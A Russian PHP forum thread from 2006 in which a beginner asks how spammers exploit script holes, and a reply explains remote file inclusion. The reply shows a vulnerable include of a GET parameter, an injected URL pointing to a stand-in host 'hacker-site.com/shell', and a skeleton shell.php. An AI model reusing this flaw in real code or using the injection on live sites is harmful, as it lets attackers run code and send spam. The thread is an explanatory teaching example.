|
| |
|
|
| |
для: tAleks
(24.10.2006 в 15:39)
| | | Ну дыра - это ошибка в коде, позволяющая злоумышленнику каким-то образом навредить Вашему сайту...Не знаю, что там имел ввиду Ваш хостер, но допустим:
<?php
include("headers");
if(isset($_GET['case']))
{
$case = $_GET['case'];
}
else
{
$case = "";
}
switch($case)
{
case 'feedback':
case 'news': //И т.д.
//"Дыра"
include($case.".php");
break;
default:
include("main");
break;
}
include("footer");
?>
|
Если вместо $case подставить http://hacker-site.com/shell, то получится, что будет включена след. страница
include("http://hacker-site.com/shell.php");
В shell.php злоумышленник может написать, например:
<?php
header("Content-type: text/plane; charset=utf-8");
echo <<< THIS_IS_HACK_CODE
<?php
//Тут код спама...
?>
THIS_IS_HACK_CODE;
?>
|
| |
| |
|
|
| |
|
|
| |
для: Unkind™
(24.10.2006 в 15:34)
| | | Я PHP занялся 3 месяца назад.
Объясните мне плиз, что такое дыра, через окотрую можно слать спам. Как она примерно выглядит?
Только давайте без приколов.... | |
| |
|
|
| |
|
|
| |
для: tAleks
(24.10.2006 в 15:11)
| | | Может хостер имел ввиду, если через дыру будут отправляться спам, хоть Вы это, естественно не хотите, то Ваш ресурс будет все равно заблокирован.
Объясните мне пожалуйста, как вообще такое возможно, и как от этого защититься.
Такое возможно при наличии дыры :))) Как защититься? Не допускать появления дыр, как еще :))
Да и вообще желательно везде делать защиту картинкой, где есть отправка e-mail'а... | |
| |
|
|
| |
|
|
| | На сайте хостера в форуме прочитал, что спамеры через дыру в скрипте могут через мой сайт отправить 100000 писем, за что меня может наказать провайдер.
Объясните мне пожалуйста, как вообще такое возможно, и как от этого защититься. | |
| |
|
|
|
